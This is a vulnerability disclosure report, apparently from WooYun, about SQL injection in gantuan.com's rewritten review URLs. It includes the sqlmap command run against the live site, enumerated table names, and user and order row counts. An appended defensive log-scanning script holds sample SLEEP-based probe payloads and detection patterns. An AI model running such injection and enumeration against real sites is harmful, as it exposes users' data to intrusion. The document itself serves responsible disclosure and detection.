Vulnerability details

Disclosure status:

2014-04-01: Details sent to the vendor, awaiting the vendor's handling
2014-04-02: Vendor has confirmed; details disclosed to the vendor only
2014-04-12: Details disclosed to core white hats and experts in the relevant field
2014-04-22: Details disclosed to regular white hats
2014-05-02: Details disclosed to intern white hats
2014-05-16: Details disclosed to the public

Brief description:

With the graceful guitar of 阿飞西雅's "Graduation Trip" playing, here I come....

Detailed description:

Thanks again to a certain site's friendly link for speeding up my arrival at Gantuan.

#1 Injection point

http://www.gantuan.com/review/5573.html  (the review id is passed through URL rewriting~)

#2 run...

sqlmap.py -u "http://www.gantuan.com/review/5573*.html" --dbms="mysql" --time-sec=6 --current-user --current-db --charset=GBK

(screenshot: sql_1.png)

Proof of vulnerability:

Reading the tables

current user:    'gantuan@localhost'
Database: gantuan
[47 tables]
+---------------------------------------+
| order |
| user |
| address |
| ask |
| card |
| category |
| code |
| coupon |
| coupon2 |
| cpd_count |
| cpd_sign |
| fav |
| feedback |
| flow |
| friendlink |
| invite |
| logger_admin |
| logo |
| lym |
| matters |
| news |
| order_count |
| package |
| page |
| partner |
| pay |
| region |
| review |
| smssubscribe |
| special |
| special_models |
| subscribe |
| system |
| team |
| team_combina |
| team_stock |
| team_style |
| team_style_term |
| teamtag |
| topic |
| tuan_navs |
| tuan_type_tip |
| vote_feedback_input |
| vote_feedback_question |
| vote_options |
| vote_question |
| weibo_coupon |
+---------------------------------------+

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
... (omitted)

Also counted the rows in the gantuan database along the way

Database: gantuan
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| `user` | 964453 |
| card | 512338 |
| cpd_count | 504575 |
| `order` | 467637 |
| subscribe | 446995 |
| pay | 382986 |
... (omitted)

(screenshot: sql_2.png)

The above was only a test; not a shred of data was taken.

Remediation:

Never mind the gift for now; pick up your keyboard and fix it fast :)
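As an added illustration from the defending side (not part of the original report), the script below scans web-server access-log lines for requests to the rewritten review URL whose id segment is not a plain integer, which is how probing of an endpoint like this shows up in logs; the sample log lines, the /review/<id>.html rewrite pattern and all function names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the report): two normal review
# requests, one delay-function probe, and one request with an encoded quote.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Apr/2014:10:00:01 +0800] "GET /review/5573.html HTTP/1.1" 200 8123
10.0.0.9 - - [01/Apr/2014:10:00:07 +0800] "GET /review/5573%20AND%20SLEEP(6).html HTTP/1.1" 200 8123
10.0.0.9 - - [01/Apr/2014:10:00:14 +0800] "GET /review/5573%27.html HTTP/1.1" 500 312
10.0.0.7 - - [01/Apr/2014:10:00:20 +0800] "GET /review/5580.html HTTP/1.1" 200 7990
"""

# Common log format: client ip, two "-" fields, [timestamp], "METHOD path PROTO", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Assumed rewrite rule: /review/<id>.html maps <id> straight into the review query
REVIEW_RE = re.compile(r'^/review/(?P<id>.*)\.html$')
# MySQL delay functions that time-based blind probes rely on
DELAY_RE = re.compile(r'\b(SLEEP|BENCHMARK)\s*\(', re.IGNORECASE)


def classify(path):
    """Return None for a well-formed review request, otherwise a short reason."""
    decoded = unquote(path)  # decode %xx so encoded quotes and spaces are visible
    m = REVIEW_RE.match(decoded)
    if not m:
        return None  # not a review URL; outside the scope of this check
    rid = m.group('id')
    if rid.isdigit():
        return None  # the only shape the rewrite rule should ever hand to the query
    if DELAY_RE.search(rid):
        return 'time-based-probe'
    return 'non-numeric-id'


def scan(log_text):
    """Return (ip, timestamp, decoded path, reason) for each suspicious review request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        reason = classify(m.group('path'))
        if reason:
            hits.append((m.group('ip'), m.group('ts'), unquote(m.group('path')), reason))
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The real fix is in the application: cast the rewritten id to an integer or bind it as a query parameter before it reaches MySQL; this scan only helps spot probing after the fact.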

Copyright notice: please credit the source when reposting. Comer@乌云

Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed at: 2014-04-02 00:51

Vendor reply:

We have verified that this issue does exist, and it has now been fixed! Many thanks for your contribution to the security of Gantuan!

Latest status:

None yet

Vulnerability rating: